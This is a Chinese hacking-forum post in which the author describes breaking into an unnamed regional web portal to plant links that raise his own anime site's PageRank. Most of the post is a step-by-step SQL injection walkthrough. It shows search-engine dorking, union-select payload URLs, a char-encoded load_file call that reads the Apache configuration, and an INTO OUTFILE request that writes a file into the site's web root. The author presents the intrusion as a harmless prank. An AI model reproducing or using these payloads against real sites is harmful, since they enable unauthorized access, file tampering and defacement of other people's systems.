入侵某地方门户加PR
文章作者:云中鹰信息来源:噩靈戰隊(http://bbs.x-xox-x.com)
今天挺无聊的,打开QQ也不知道和谁扯淡。最近在开个动漫站,正愁没有方法提高PR,正好看到某B在XX地上线了,在网上查了下XX地的门户www.xxxxxxx.com,查了下价值。觉得还过的去(图1),就去鸟他了。
http://www.hacknote.com/uploadfile/2009-02-28/HackNote.Com214527734.JPG
图1
个人比较喜欢日PHP,于是在GG搜索inurl:.php site:xxxxxxx.com(图2),在黑框框内发现某分站的路径,接下来就搜索了inurl:.php site:www.xxxxxxx.com,发现一个PHP的点,用and 1=1和and 1=2,然后用order by 6/*发现有6个表,再访问http://www.xxxxxxx.com/xxxx/comxxx.php?classid=206 and 1=2 union select 1,2,3,4,5,6/*,显示出“2”(图3)
http://www.hacknote.com/uploadfile/2009-02-28/HackNote.Com214528621.JPG
图2
http://www.hacknote.com/uploadfile/2009-02-28/HackNote.Com214529371.JPG
图3
话说之前我们不是发现一个路径吗?现在来读下APACHE的配置文件:“/usr/local/apache2/conf/httpd.conf”,转换后放入URL里访问:http://www.xxxxxxx.com/xxxx/comxxx.php?classid=206 and 1=2 union select 1, load_file(char(47,117,115,114,47,108,111,99,97,108,47,97,112,97,99,104,101,50,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102)),3,4,5,6/*。然后搜索关键字htdocs找到目录为/www/xxxxxx.com/www/,用工具看了下,发现magic_quotes_gpc=Off。嘿嘿,这样就好了,可以用OUTFILE INTO写文件进去,提交URL为:“http://www.xxxxxxx.com/xxxx/comxxx.php?classid=206/**/and/**/1=2/**/union/**/select/**/1,2,3,4,'by
yzy',6%20from user into
outfile
'/www/xxxxxx.com/www/yzy.txt'/*”这样文件就写上去了(图4)。
http://www.hacknote.com/uploadfile/2009-02-28/HackNote.Com214530112.JPG
图4
接下来只要加上我站的连接就可以了,我只是为了PR,管理员叔叔不要怪我哦。Boku no iyaa,I’m coming.
页:
[1]